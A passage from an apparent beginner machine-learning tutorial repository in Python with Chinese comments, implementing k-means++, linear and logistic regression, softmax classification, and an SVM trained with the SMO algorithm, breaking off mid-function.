plt.plot(list(range(len(bpnn[1]))), bpnn[1], label='验证', color='r', marker='.', linewidth=2)
ax1.tick_params(axis='y', labelcolor='r')
legend = ax1.legend(loc='upper center', shadow=True, fontsize='x-large')
legend.get_frame().set_facecolor('#F0F8FF')
ax1.grid(True)
ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis
ax2.set_ylabel('正确率', color='b') # we already handled the x-label with ax1
plt.plot(list(range(len(bpnn[2]))), bpnn[2], label='训练', color='b', marker='*', linewidth=2)
plt.plot(list(range(len(bpnn[3]))), bpnn[3], label='验证', color='b', marker='.', linewidth=2)
ax2.tick_params(axis='y', labelcolor='b')
legen = ax2.legend(loc='lower center', shadow=True, fontsize='x-large')
legen.get_frame().set_facecolor('#FFFAFA')
ax2.grid(True)
ax2.yaxis.set_major_locator(y_toge)
ax2.yaxis.set_minor_locator(y_son)
fig.tight_layout() # otherwise the right y-label is slightly clipped
plt.title('%s折训练VS验证 结果对比' % fold, fontsize=16)
plt.savefig(r'C:\Users\GWT9\Desktop\%s_fol8.jpg' % fold)
# 绘制K次的结果展示
plt.figure()
plt.plot(list(range(len(corrsave_train))), corrsave_train, label='训练', color='b', marker='s', linewidth=2)
plt.plot(list(range(len(corrsave_add))), corrsave_add, label='验证', color='r', marker='8', linewidth=2)
plt.plot(list(range(len(corrsave_test))), corrsave_test, label='测试', color='k', marker='d', linewidth=2)
plt.xlabel('折数')
plt.ylabel('正确率')
plt.title('绘制K次的不同数据集的结果展示', fontsize=16)
plt.grid(True)
plt.legend()
plt.savefig(r'C:\Users\GWT9\Desktop\last_fol8.jpg')
plt.show()
```
#### File: Machine-Learning-for-Beginner-by-Python3/Kmeans Cluster/Kmeans_AnFany.py
```python
from Wine_Data import DATA
import numpy as np
# 定义欧几里得距离
def dis(sample, center):
cen = np.array([center])
sample = np.array(sample)
if len(sample) != 0:
usb = np.sum((sample - cen) ** 2, axis=1) ** 0.5
return usb
else:
return 0
# 定义根据距离列表,概率较大的被选中
def selec(dislist):
#首先将所有数值除以距离和
divided = dislist / np.sum(dislist)
# 随机选取0-1之内的数字
num = np.random.random()
for hh in range(len(divided)):
num -= divided[hh]
if num < 0:
return hh
# 定义生成初始的聚类中心的函数
def gencenter(sample, type):
# 随机选择初始的样本编号
sign = np.random.choice(list(range(len(sample))), 1)[0]
#存储类别中心的数组
centerlist = [sample[sign]]
while len(centerlist) < type:
# 添加新的
distance = dis(sample, centerlist[-1]) # 和刚添加的中心计算距离
newsign = selec(distance)
centerlist.append(sample[newsign])
return np.array(centerlist)
# Kmeans++聚类算法
def kmeans(samp, maxtimes, costerror, countcenter):
# kmeans++ 产生出的初始的类别中心
center = gencenter(samp, type=countcenter)
# 存储成本函数的值
costfunc = []
iter = 0
while iter < maxtimes:
# 开始根据类别中心匹配距离
samdict = {}
signdict = {}
# 每个类别 定义成一个集合
for jj in range(len(center)):
samdict[jj] = [] # 存储样本
signdict[jj] = [] # 存储样本编号
# 为每一个样本计算类别
dictgn = 0
for hg in samp:
ddis = dis(center, hg) #计算样本与每一个类别中心的距离
# 找到最小的
minsign = ddis.argmin()
samdict[minsign].append(hg) # 添加到该类别的样本集合中
signdict[minsign].append(dictgn)
dictgn += 1
# 计算此时分类结果的cost
cost = 0
for cc in samdict:
cost += np.sum(dis(samdict[cc], center[cc]))
# 存储cost
costfunc.append(cost)
# 判断是否提前结束迭代
if len(costfunc) > 2:
if 0 <= costfunc[-2] - costfunc[-1] < costerror:
break
# 更新类别中心
for kk in samdict:
if len(signdict[kk]) != 0:
center[kk] = np.mean(samdict[kk], axis=0) # 均值
iter += 1
return center, costfunc, signdict
# 因为Kmeans 算法不保证每一次都取得最优值。因此定义运行的次数,选择cost最小的
def op_kmeans(saple, maxti=1000, costerr=1e-19, countcen=3, maxtimes=90):
times = 0
# 存储cost
costff = [1e9]
#最优的结果lastre
lastre = 0
while times < maxtimes:
step = kmeans(saple, maxtimes=maxti, costerror=costerr, countcenter=countcen)
if len(costff) != 0:
if costff[0] > step[1][-1]:
lastre = step
costff = [step[1][-1]]
else:
costff = [step[1][-1]]
times += 1
return lastre
# 结果验证
# 首先得出原始数据中的类别对应的编号
def get_start(ydata):
in_class = {}
classtype = sorted(list(set(list(ydata))))
for du in range(len(classtype)):
in_class[du+1] = np.arange(len(ydata))[ydata == classtype[du]]
return in_class
# 因为算法生成的类别和原始的类别的对应关系不知,下面按照最大的重复比来一一确认
def judge(starclass, endclass, ydata):
newclass = {} #存储判断出类别后的数据
clasdict = {} # 存储算法生成的类别和真实类别的对应关系的字典
for ekey in endclass:
judg = []
for skey in starclass:
# 判断和原始类别中的哪一个元素重复比最高
repeat = [len([val for val in endclass[ekey] if val in starclass[skey]]), skey]
judg.append(repeat)
# 选择最大的数,确定类别
judg = np.array(judg)
du = judg[judg.argmax(axis=0)[0]][1] #判断出来属于哪一类
clasdict[ekey] = du # 算法生成的类别:原始的类别
newclass[du] = endclass[ekey]
# 按样本的序号输出其对应的类别
newdata = np.ones(len(ydata))
for fgh in newclass:
for hu in newclass[fgh]:
newdata[hu] = fgh
return newdata, clasdict
# 计算混淆矩阵
#计算混淆矩阵
from prettytable import PrettyTable
def confusion(realy, outy, method='AnFany'):
mix = PrettyTable()
type = sorted(list(set(realy.T[0])), reverse=True)
mix.field_names = [method] + ['预测:%d类'%si for si in type]
# 字典形式存储混淆矩阵数据
cmdict = {}
for jkj in type:
cmdict[jkj] = []
for hh in type:
hu = len(['0' for jj in range(len(realy)) if realy[jj][0] == jkj and outy[jj][0] == hh])
cmdict[jkj].append(hu)
# 输出表格
for fu in type:
mix.add_row(['真实:%d类'%fu] + cmdict[fu])
return mix
# 最终的程序
if __name__ == "__main__":
init_class = get_start(DATA[1])
kresult = op_kmeans(DATA[0])
newy = judge(init_class, kresult[2], DATA[1])
# #输出混淆矩阵
print('混淆矩阵:\n', confusion(np.array([DATA[1]]).T, np.array([newy[0]]).T))
# 输出最后计算得到的真实类别的类别中心
for real in kresult[2]:
print('类别%s的中心为:\n%s' % (newy[1][real], kresult[0][real]))
# 绘制成本函数图
import matplotlib.pyplot as plt
from pylab import mpl # 作图显示中文
mpl.rcParams['font.sans-serif'] = ['FangSong'] # 设置中文字体新宋体
mpl.rcParams['axes.unicode_minus'] = False
plt.plot(list(range(len(kresult[1]))), kresult[1], '-', linewidth=5)
plt.title('成本函数图')
plt.ylabel('Cost 值')
plt.xlabel('迭代次数')
plt.show()
```
#### File: Machine-Learning-for-Beginner-by-Python3/Kmeans Cluster/Kmeans_Compare.py
```python
import Kmeans_AnFany as K_Af # AnFany
import Kmeans_Sklearn as K_Sk # Sklearn
import matplotlib.pyplot as plt
from pylab import mpl # 作图显示中文
mpl.rcParams['font.sans-serif'] = ['FangSong'] # 设置中文字体新宋体
mpl.rcParams['axes.unicode_minus'] = False
import numpy as np
# 利用sklearn生成数据集
from sklearn.datasets import make_blobs
X, Y = make_blobs(n_samples=600, centers=6, n_features=2)
# 绘制散点图
def fig_scatter(exdata, eydata, titl='训练数据散点图', co=['r', 'g', 'k', 'b', 'y', 'm'], marker=['o','^','H','v','d','>']):
typeclass = sorted(list(set(eydata)))
for ii in range(len(typeclass)):
datax = exdata[eydata == typeclass[ii]]
plt.scatter(datax[:, 0], datax[:, -1], c=co[ii], s=50, marker=marker[ii])
plt.title(titl)
#plt.legend(['%d类'%i for i in typeclass], bbox_to_anchor=(1.2, 0.9))
plt.xlabel('特征1')
plt.ylabel('特征2')
# 调用不同的方法
# AnFany
kresult = K_Af.op_kmeans(X, countcen=6)
# Sklearn
sk = K_Sk.KMeans(init='k-means++', n_clusters=6, n_init=10)
train = sk.fit(X)
result = sk.predict(X)
skru = K_Sk.trans(result)
#绘制算法后的类别的散点图
def sca(Xdata, Center, signdict, co=['r', 'g', 'y', 'b', 'c', 'm'], marker=['o','^','H','s','d','*'], titl = 'AnFany 结果'):
du = 1
for jj in signdict:
xdata = Xdata[signdict[jj]]
plt.scatter(xdata[:, 0], xdata[:, -1], c=co[jj], s=50, marker=marker[jj], label='%d类' % jj) # 绘制样本散点图
for ss in Center:
if du:
plt.scatter(ss[0], ss[1], c='k', s=100, marker='8', label='类别中心') #绘制类别中心点
du = 0
else:
plt.scatter(ss[0], ss[1], c='k', s=100, marker='8') # 绘制类别中心点
plt.legend(bbox_to_anchor=(1.2, 1))
plt.title(titl)
plt.xlabel('特征1')
plt.ylabel('特征2')
# 定义欧几里得距离
def dis(sample, center):
cen = np.array([center])
sample = np.array(sample)
if len(sample) != 0:
usb = np.sum((sample - cen) ** 2, axis=1) ** 0.5
return usb
else:
return 0
# 计算最终的分类结果的成本值
def Cost(Xdata, typedict):
center = {}
for kk in typedict:
center[kk] = np.mean(Xdata[typedict[kk]], axis=0) # 均值
cio = 0
for cc in typedict:
cio += np.sum(dis(Xdata[typedict[cc]], center[cc]))
return cio
# 最终的结果展示
plt.subplot(2, 2, 1)
fig_scatter(X, Y)
plt.subplot(2, 2, 2)
sca(X, kresult[0], kresult[2])
plt.subplot(2, 2, 3)
sca(X, train.cluster_centers_, skru, titl='Sklearn 结果')
plt.subplot(2, 2, 4)
plt.axis('off')
plt.text(0.3, 0.6, 'AnFany 最终的分类成本值为:%.5f'%Cost(X, kresult[2]))
plt.text(0.3, 0.3, 'Sklearn 最终的分类成本值为:%.5f'%Cost(X, skru))
plt.show()
```
#### File: Machine-Learning-for-Beginner-by-Python3/Kmeans Cluster/Kmeans_Sklearn.py
```python
from Wine_Data import DATA
import numpy as np
from sklearn.cluster import KMeans
# 需要将算法输出的类别转换为真实的类别
# 首先得出原始数据中的类别对应的编号
def get_start(ydata):
in_class = {}
classtype = sorted(list(set(list(ydata))))
for du in range(len(classtype)):
in_class[du+1] = np.arange(len(ydata))[ydata == classtype[du]]
return in_class
# 因为算法生成的类别和原始的类别的对应关系不知,下面按照最大的重复比来一一确认
def judge(starclass, endclass, ydata):
newclass = {} #存储判断出类别后的数据
clasdict = {} # 存储算法生成的类别和真实类别的对应关系的字典
for ekey in endclass:
judg = []
for skey in starclass:
# 判断和原始类别中的哪一个元素重复比最高
repeat = [len([val for val in endclass[ekey] if val in starclass[skey]]), skey]
judg.append(repeat)
# 选择最大的数,确定类别
judg = np.array(judg)
du = judg[judg.argmax(axis=0)[0]][1] #判断出来属于哪一类
clasdict[ekey] = du # 算法生成的类别:原始的类别
newclass[du] = endclass[ekey]
# 按样本的序号输出其对应的类别
newdata = np.ones(len(ydata))
for fgh in newclass:
for hu in newclass[fgh]:
newdata[hu] = fgh
return newdata, clasdict
# 计算混淆矩阵
#计算混淆矩阵
from prettytable import PrettyTable
def confusion(realy, outy, method='Sklearn'):
mix = PrettyTable()
type = sorted(list(set(realy.T[0])), reverse=True)
mix.field_names = [method] + ['预测:%d类'%si for si in type]
# 字典形式存储混淆矩阵数据
cmdict = {}
for jkj in type:
cmdict[jkj] = []
for hh in type:
hu = len(['0' for jj in range(len(realy)) if realy[jj][0] == jkj and outy[jj][0] == hh])
cmdict[jkj].append(hu)
# 输出表格
for fu in type:
mix.add_row(['真实:%d类'%fu] + cmdict[fu])
return mix
# 将sklearn输出的结果变为字典形式
def trans(resu):
redict = {}
for ire in range(len(resu)):
try:
redict[resu[ire]].append(ire)
except KeyError:
redict[resu[ire]] = [ire]
return redict
# 最终的程序
if __name__ == "__main__":
sk = KMeans(init='k-means++', n_clusters=3, n_init=10)
train = sk.fit(DATA[0])
result = sk.predict(DATA[0])
init_class = get_start(DATA[1])
kresult = trans(result)
newy = judge(init_class, kresult, DATA[1])
# 输出混淆矩阵
print('混淆矩阵:\n', confusion(np.array([DATA[1]]).T, np.array([newy[0]]).T))
# 输出类别中心
print(train.cluster_centers_)
```
#### File: Machine-Learning-for-Beginner-by-Python3/Linear Regression/Linear_Regression_AnFany.py
```python
from Boston_Data import model_data as lrdata
import numpy as np
#创建线性回归的类
class LinearRegression:
#w和b合为一个参数,也就是x最后加上一列全为1的数据
def __init__(self, learn_rate=0.2, iter_times=200000, error=1e-9):
self.learn_rate = learn_rate
self.iter_times = iter_times
self.error = error
def Trans(self, xdata):
one1 = np.ones(len(xdata))
xta = np.append(xdata, one1.reshape(-1, 1), axis=1)
return xta
#梯度下降法
def Gradient(self, xdata, ydata):
xdata = self.Trans(xdata)
#系数w,b的初始化
self.weights = np.zeros((len(xdata[0]), 1))
#存储成本函数的值
cost_function = []
for i in range(self.iter_times):
#得到回归的值
y_predict = np.dot(xdata, self.weights)
# 最小二乘法计算误差
cost = np.sum((y_predict - ydata) ** 2) / len(xdata)
cost_function.append(cost)
#计算梯度
dJ_dw = 2 * np.dot(xdata.T, (y_predict - ydata)) / len(xdata)
#更新系数w,b的值
self.weights = self.weights - self.learn_rate * dJ_dw
#提前结束循环的机制
if len(cost_function) > 1:
if 0 < cost_function[-2] - cost_function[-1] < self.error:
break
return self.weights, cost_function
#根据公式
def Formula(self, xdata, ydata):
xdata = self.Trans(xdata)
self.weights = np.dot(np.dot(np.linalg.inv(np.dot(xdata.T, xdata)), xdata.T), ydata)
y_predict = np.dot(xdata, self.weights)
cost = [np.sum((ydata - np.mean(ydata)) ** 2) / len(xdata)] # 开始是以y值得平均值作为预测值计算cost
cost += [np.sum((y_predict - ydata) ** 2) / len(xdata)] # 利用公式,一次计算便得到参数的值,不需要迭代。
return self.weights, cost # 包括2个值
#预测
def predict(self, xdata):
return np.dot(self.Trans(xdata), self.weights)
#绘图
import matplotlib.pyplot as plt
from pylab import mpl # 作图显示中文
mpl.rcParams['font.sans-serif'] = ['SimHei'] # 设置中文字体
mpl.rcParams['axes.unicode_minus'] = False
def figure(title, *datalist):
for jj in datalist:
plt.plot(jj[0], '-', label=jj[1], linewidth=2)
plt.plot(jj[0], 'o')
plt.grid()
plt.title(title)
plt.legend()
plt.show()
#计算R2的函数
def getR(ydata_tr, ydata_pre):
sum_error = np.sum(((ydata_tr - np.mean(ydata_tr)) ** 2))
inexplicable = np.sum(((ydata_tr - ydata_pre) ** 2))
return 1 - inexplicable / sum_error
# 最终的程序
if __name__ == "__main__":
regressor = LinearRegression()
# 开始训练
train_error = regressor.Gradient(lrdata[0], lrdata[1])
# 用于预测数据的预测值
predict_result = regressor.predict(lrdata[2])
# 用于训练数据的预测值
train_pre_result = regressor.predict(lrdata[0])
# 绘制误差图
figure('误差图 最终的MSE = %.4f' % (train_error[1][-1]), [train_error[1], 'error'])
# 绘制预测值与真实值图
figure('预测值与真实值图 模型的' + r'$R^2=%.4f$' % (getR(lrdata[1], train_pre_result)), [predict_result, '预测值'],
[lrdata[3], '真实值'])
plt.show()
# 线性回归的参数
print('线性回归的系数为:\n w = %s, \nb= %s' % (train_error[0][:-1], train_error[0][-1]))
```
#### File: Machine-Learning-for-Beginner-by-Python3/Linear Regression/TensorFlow_rewrite.py
```python
import tensorflow as tf
# 参数
#对于没有归一化的数据,一般要设置较小的学习率
def train_tf(xxdata, yydata, learn_rate=0.00002, iter_times=6000, error=1e-9):
#占位符
# 预先输入的数据
x_data = tf.placeholder(shape=[None, len(xxdata[0])], dtype=tf.float32)
y_data = tf.placeholder(shape=[None, 1], dtype=tf.float32)
# 线性回归参数
Weight = tf.Variable(tf.random_normal(shape=[len(xxdata[0]), 1]))
Bias = tf.Variable(tf.random_normal(shape=[1, 1]))
y_out = tf.add(tf.matmul(x_data, Weight), Bias)
# 损失函数
cost = tf.reduce_mean(tf.square(y_out - y_data)) #+ reg_term
# 初始化
sess = tf.Session()
init = tf.global_variables_initializer()
sess.run(init)
optimizer = tf.train.GradientDescentOptimizer(learn_rate).minimize(cost)
#误差存储
costfunc = []
for i in range(iter_times):
sess.run(optimizer, feed_dict={x_data: xxdata, y_data: yydata})
y_step_out = sess.run(y_out, feed_dict={x_data: xxdata})
loss = sess.run(cost, feed_dict={y_out: y_step_out, y_data: yydata})
costfunc.append(loss)
# 提前结束循环的机制
if len(costfunc) > 1:
if 0 < costfunc[-2] - costfunc[-1] < error:
break
predata = sess.run(y_out, feed_dict={x_data: xxdata})
return predata, Weight.eval(session=sess), Bias.eval(session=sess)
```
#### File: Machine-Learning-for-Beginner-by-Python3/Logistic Regression/LR_AnFany.py
```python
from Heart_Data import model_data as H_Data
import numpy as np
#计算混淆矩阵
from prettytable import PrettyTable
def confusion(realy, outy):
mix = PrettyTable()
type = sorted(list(set(realy.T[0])), reverse=True)
mix.field_names = [' '] + ['预测:%d类'%si for si in type]
# 字典形式存储混淆矩阵数据
cmdict = {}
for jkj in type:
cmdict[jkj] = []
for hh in type:
hu = len(['0' for jj in range(len(realy)) if realy[jj][0] == jkj and outy[jj][0] == hh])
cmdict[jkj].append(hu)
# 输出表格
for fu in type:
mix.add_row(['真实:%d类'%fu] + cmdict[fu])
return mix
# 返回混淆矩阵用到的数据TP,TN,FP,FN
def getmatrix(realy, outy, possclass=1): # 默认类1 为正类
TP = len(['0' for jj in range(len(realy)) if realy[jj][0] == possclass and outy[jj][0] == possclass]) # 实际正预测正
TN = len(['0' for jj in range(len(realy)) if realy[jj][0] == 1 - possclass and outy[jj][0] == 1 - possclass]) # 实际负预测负
FP = len(['0' for jj in range(len(realy)) if realy[jj][0] == 1- possclass and outy[jj][0] == possclass]) # 实际负预测正
FN = len(['0' for jj in range(len(realy)) if realy[jj][0] == possclass and outy[jj][0] == 1 - possclass]) # 实际正预测负
# 假正率
FPR = FP / (FP + TN)
# 真正率
TPR = TP / (TP + FN)
return [FPR, TPR]
class LRReg:
def __init__(self, learn_rate=0.5, iter_times=40000, error=1e-9, cpn='L2'):
self.learn_rate = learn_rate
self.iter_times = iter_times
self.error = error
self.cpn = cpn
# w和b合为一个参数,也就是x最后加上一列全为1的数据。
def trans(self, xdata):
one1 = np.ones(len(xdata))
xta = np.append(xdata, one1.reshape(-1, 1), axis=1)
return xta
# 梯度下降法
def Gradient(self, xdata, ydata, func=trans):
xdata = func(self, xdata)
# 系数w,b的初始化
self.weights = np.zeros((len(xdata[0]), 1))
# 存储成本函数的值
cost_function = []
for i in range(self.iter_times):
# 得到回归的值
y_predict = np.dot(xdata, self.weights)
# Sigmoid函数的值
s_y_pre = 1/ (1 + np.exp(-y_predict))
# 计算最大似然的值
like = np.sum(np.dot(ydata.T, np.log(s_y_pre)) + np.dot((1 - ydata).T, np.log(1- s_y_pre)))
# 正则化
if self.cpn == 'L2':
# 成本函数中添加系数的L2范数
l2norm = np.sum(0.5 * np.dot(self.weights.T, self.weights) / len(xdata))
cost = -like / len(xdata) + l2norm
grad_W = np.dot(xdata.T, (s_y_pre - ydata)) / len(xdata) + 0.9 * self.weights / len(xdata)
else:
cost = -like / (len(xdata))
grad_W = np.dot(xdata.T, (s_y_pre - ydata)) / len(xdata)
cost_function.append(cost)
print(cost, like)
# 训练提前结束
if len(cost_function) > 2:
if 0 <= cost_function[-1] - cost_function[-2] <= self.error:
break
#更新
self.weights = self.weights - self.learn_rate * grad_W
return self.weights, cost_function
# 预测
def predict(self, xdata, func=trans, yuzhi=0.5):
pnum = np.dot(func(self, xdata), self.weights)
s_pnum = 1/ (1 + np.exp(-pnum))
latnum = [[1] if jj[0] >= yuzhi else [0] for jj in s_pnum]
return latnum
# 主函数
if __name__ == "__main__":
lr_re = LRReg()
lf = lr_re.Gradient(H_Data[0], H_Data[1])
print('系数为:\n', lr_re.weights)
# 绘制ROC曲线
# 从0到1定义不同的阈值
yuzi = np.linspace(0, 1, 101)
# ROC 曲线数据
roc = []
# 开始遍历不同的阈值
for yy in yuzi:
fdatd = lr_re.predict(H_Data[0], yuzhi=yy)
if yy == 0.5:
print('阈值为%s时的混淆矩阵:\n' % yy, confusion(H_Data[1], fdatd))
roc.append(getmatrix(H_Data[1], fdatd))
# 绘制ROC曲线图
# 首线是FPR按着从小到大排列
fu = np.array(sorted(roc, key=lambda x: x[0]))
import matplotlib.pyplot as plt
from pylab import mpl # 作图显示中文
mpl.rcParams['font.sans-serif'] = ['Microsoft Yahei']
# 开始绘制ROC曲线图
fig, ax1 = plt.subplots()
ax1.plot(list(fu[:, 0]), list(fu[:, 1]), '.', linewidth=4, color='r')
ax1.plot([0, 1], '--', linewidth=4)
ax1.grid('on')
ax1.legend(['分类器模型', '随机判断模型'], loc='lower right', shadow=True, fontsize='medium')
ax1.annotate('完美分类器', xy=(0, 1), xytext=(0.2, 0.7), color='#FF4589', arrowprops=dict(facecolor='#FF67FF'))
ax1.set_title('ROC曲线', color='#123456')
ax1.set_xlabel('False Positive Rate(FPR,假正率)', color='#123456')
ax1.set_ylabel('True Positive Rate(TPR,真正率)', color='#123456')
# 绘制成本函数图
fig, ax2 = plt.subplots()
ax2.plot(list(range(len(lf[1]))), lf[1], '-', linewidth=5)
ax2.set_title('成本函数图')
ax2.set_ylabel('Cost 值')
ax2.set_xlabel('迭代次数')
plt.show()
```
#### File: Machine-Learning-for-Beginner-by-Python3/Softmax Regression/Softmax_Sklearn.py
```python
import sklearn as sk
from Iris_Data import Data as smdata
import numpy as np
from sklearn.linear_model import LogisticRegression
sklr = LogisticRegression(multi_class='multinomial', solver='sag', C=200, max_iter=10000)
#格式化输出混淆矩阵
from prettytable import PrettyTable
def confusion(realy, outy, method='Sklearn'):
mix = PrettyTable()
type = sorted(list(set(realy.T[0])), reverse=True)
mix.field_names = [method] + ['预测:%d类'%si for si in type]
# 字典形式存储混淆矩阵数据
cmdict = {}
for jkj in type:
cmdict[jkj] = []
for hh in type:
hu = len(['0' for jj in range(len(realy)) if realy[jj][0] == jkj and outy[jj][0] == hh])
cmdict[jkj].append(hu)
# 输出表格
for fu in type:
mix.add_row(['真实:%d类'%fu] + cmdict[fu])
return mix
# 将独热编码的类别变为标识为1,2,3的类别
def transign(eydata):
ysign = []
for hh in eydata:
ysign.append([list(hh).index(1) + 1])
return np.array(ysign)
# 主函数
if __name__ == '__main__':
regre = sklr.fit(smdata[0], transign(smdata[1]).T[0])
predata = np.array([sklr.predict(smdata[0])]).T
print('系数为:\n', np.hstack((sklr.coef_, np.array([sklr.intercept_]).T)).T)
print('混淆矩阵:\n', confusion(transign(smdata[1]), predata))
```
#### File: SVM/SVM_Classify/AnFany_SVM_Classify.py
```python
"""
第一部分:引入库
"""
import numpy as np
import matplotlib.pyplot as plt
from pylab import mpl
mpl.rcParams['font.sans-serif'] = ['FangSong'] # 中文字体名称
mpl.rcParams['axes.unicode_minus'] = False # 显示负号
"""
第二部分:构建核函数以及SVM的结构
"""
# 构建核函数
class KERNEL:
"""
linear:线性 rbf:高斯 sigmoid:Sigmoid型 poly:多项式
核函数:注意输入数据的shape以及输出数据的shape。
xVSy包括3种情况:单样本VS单样本 单样本VS多样本 多样本VS多样本
"""
def __init__(self, polyd=3, rbfsigma=0.2, tanhbeta=0.6, tanhtheta=-0.6):
self.polyd = polyd
self.rbfsigma = rbfsigma
self.tanhbeta = tanhbeta
self.tanhtheta = tanhtheta
def trans(self, x):
x = np.array(x)
if x.ndim == 1:
x = np.array([x])
return x
# 线性核函数
def linear(self, x, y): # 输出的结果shape=(len(y), len(x))
x, y = self.trans(x), self.trans(y)
if len(x) == 1:
return (x * y).sum(axis=1, keepdims=True)
else:
sx = x.reshape(x.shape[0], -1, x.shape[1])
return (sx * y).sum(axis=2).T
# Singmoid型核函数
def sigmoid(self, x, y): # 输出的结果shape=(len(y), len(x))
x, y = self.trans(x), self.trans(y)
if len(x) == 1:
return np.tanh(self.tanhbeta * ((x * y).sum(axis=1, keepdims=True)) + self.tanhtheta)
else:
sx = x.reshape(x.shape[0], -1, x.shape[1])
return np.tanh(self.tanhbeta * ((sx * y).sum(axis=2).T) + self.tanhtheta)
# 多项式核函数
def poly(self, x, y): # 输出的结果shape=(len(y), len(x))
x, y = self.trans(x), self.trans(y)
if len(x) == 1:
return (x * y).sum(axis=1, keepdims=True) ** self.polyd
else:
sx = x.reshape(x.shape[0], -1, x.shape[1])
return (sx * y).sum(axis=2).T ** self.polyd
# 高斯核函数
def rbf(self, x, y): # 输出的结果shape=(len(y), len(x))
x, y = self.trans(x), self.trans(y)
if len(x) == 1 and len(y) == 1:
return np.exp(self.linear((x - y), (x - y)) / (-2 * self.rbfsigma ** 2))
elif len(x) == 1 and len(y) != 1:
return np.exp((np.power(x - y, 2)).sum(axis=1, keepdims=True) / (-2 * self.rbfsigma ** 2))
else:
sx = x.reshape(x.shape[0], -1, x.shape[1])
return np.exp((np.power(sx - y, 2)).sum(axis=2).T / (-2 * self.rbfsigma ** 2))
# 构建SVM的结构
class SVM:
def __init__(self, feature, labels, kernel='rbf', C=0.8, toler=0.001, times=100):
# 训练样本的属性数据、标签数据
self.feature = feature
self.labels = labels
# SMO算法变量
self.C = C
self.toler = toler
self.alphas = np.zeros(len(self.feature))
self.b = 0
self.eps = 0.0001 # 选择拉格朗日因子
# 核函数
self.kernel = eval('KERNEL().' + kernel)
# 拉格朗日误差序列
self.errors = [self.get_error(i) for i in range(len(self.feature))]
# 循环的最大次数
self.times = times
# 计算分割线的值
def line_num(self, x):
ks = self.kernel(x, self.feature)
wx = np.matrix(self.alphas * self.labels) * ks
num = wx + self.b
return num[0][0]
# 获得编号为i的样本对应的误差
def get_error(self, i):
x, y = self.feature[i], self.labels[i]
error = self.line_num(x) - y
return error
# 更改拉格朗日因子后,更新所有样本对应的误差
def update_errors(self):
self.errors = [self.get_error(i) for i in range(len(self.feature))]
"""
第三部分:构建SMO算法需要的函数
"""
# alpha的值到L和H之间.
def clip(alpha, L, H):
if alpha < L:
return L
elif alpha > H:
return H
else:
return alpha
# 随机选择一个和当前因子不同的因子
def select_j_rand(i, m):
''' 在m中随机选择除了i之外剩余的数
'''
l = list(range(m))
seq = l[: i] + l[i + 1:]
return np.random.choice(seq)
# 启发式选择第二个因子
def select_j(i, svm):
errors = svm.errors
valid_indices = [i for i, a in enumerate(svm.alphas) if 0 < a < svm.C]
if len(valid_indices) > 1:
j = -1
max_delta = 0
for k in valid_indices:
if k == i:
continue
delta = abs(errors[i] - errors[j])
if delta > max_delta:
j = k
max_delta = delta
else:
j = select_j_rand(i, len(svm.feature))
return j
# 优化已经选择的一对因子
def take_step(i, j, svm):
# 首先获得最新的误差列表
svm.update_errors()
# 拉格朗日因子及其对应的样本数据,标签数据,误差
a_i, x_i, y_i, e_i = svm.alphas[i], svm.feature[i], svm.labels[i], svm.errors[i]
a_j, x_j, y_j, e_j = svm.alphas[j], svm.feature[j], svm.labels[j], svm.errors[j]
# 计算单样本之间的核函数
k_ii, k_jj, k_ij = svm.kernel(x_i, x_i), svm.kernel(x_j, x_j), svm.kernel(x_i, x_j)
eta = k_ii + k_jj - 2 * k_ij
if eta <= 0:
return 0
a_i_old, a_j_old = a_i, a_j
a_j_new = a_j_old + y_j * (e_i - e_j) / eta
# 对alpha进行修剪
if y_i != y_j:
Lmax = max(0, a_j_old - a_i_old)
Hmin = min(svm.C, svm.C + a_j_old - a_i_old)
else:
Lmax = max(0, a_i_old + a_j_old - svm.C)
Hmin = min(svm.C, a_j_old + a_i_old)
a_j_new = clip(a_j_new, Lmax, Hmin)
a_i_new = a_i_old + y_i * y_j * (a_j_old - a_j_new)
if abs(a_j_new - a_j_old) < svm.eps:
return 0
# 更新拉格朗日因子
svm.alphas[i], svm.alphas[j] = a_i_new, a_j_new
# 更新误差
svm.update_errors()
# 更新阈值b
b_i = -e_i - y_i * k_ii * (a_i_new - a_i_old) - y_j * k_ij * (a_j_new - a_j_old) + svm.b
b_j = -e_j - y_i * k_ij * (a_i_new - a_i_old) - y_j * k_jj * (a_j_new - a_j_old) + svm.b
if 0 < a_i_new < svm.C:
bnum = b_i
elif 0 < a_j_new < svm.C:
bnum = b_j
else:
bnum = (b_i + b_j) / 2
# 更新b值
svm.b = bnum
return 1
# 给定第一个alpha因子, 检测对应alpha是否符合KKT条件并选取第二个alpha进行迭代.
def examine_example(i, svm):
e_i, y_i, alpha = svm.errors[i], svm.labels[i], svm.alphas[i]
r = e_i * y_i
# 是否违反KKT条件
if (r < -svm.toler and alpha < svm.C) or (r > svm.toler and alpha > 0):
# 启发式选择
j = select_j(i, svm)
return take_step(i, j, svm)
else:
return 0
# Platt SMO算法实现
def platt_smo(svm):
# 循环次数
it = 0
# 遍历所有alpha的标记
entire = True
pair_changed = 0
while it < svm.times and (pair_changed > 0 or entire):
pair_changed = 0
if entire:
for i in range(len(svm.feature)):
pair_changed += examine_example(i, svm)
print('全部样本 改变的因子对数: %s' % pair_changed)
else:
alphas = svm.alphas
non_bound_indices = [i for i in range(len(svm.feature)) if alphas[i] > 0 and alphas[i] < svm.C]
for i in non_bound_indices:
pair_changed += examine_example(i, svm)
print('非边界 改变的因子数:%s' %pair_changed)
# 循环次数
it += 1
# 更改边界
if entire:
entire = False
elif pair_changed == 0:
entire = True
print('外层循环的次数: %s' % it)
return svm.alphas, svm.b
# 预测函数
def predict(svm, prefeature):
prlt = np.array((np.array([svm.alphas]).reshape(-1, 1) * svm.kernel(prefeature, svm.feature) * np.array([svm.labels]).reshape(-1, 1)).sum(axis=0) + svm.b)
signre = np.sign(prlt[0])
return signre
# 获得正确率函数
def getacc(svm, prefeature, prelabel):
predu = predict(svm, prefeature)
# 计算正确率
sub = np.array(predu - prelabel)
print(sub)
acc = len(sub[sub == 0]) / len(prelabel)
print(acc)
return acc
# 引入心脏病数据
import SVM_Classify_Data as sdata
# K折数据集字典
def result(datadict, he):
sign = []
trainacc, testacc, vec = [], [], []
resu = []
for jj in datadict:
# 训练数据
xd = datadict[jj][0][:, :-1]
yd = datadict[jj][0][:, -1]
# 测试数据
texd = datadict[jj][1][:, :-1]
teyd = datadict[jj][1][:, -1]
# 建立模型
resu = SVM(feature=xd, labels=yd, kernel=he)
# 开始训练
platt_smo(resu)
# 训练完,储存训练、测试的精确度结果
traaa = getacc(resu, xd, yd)
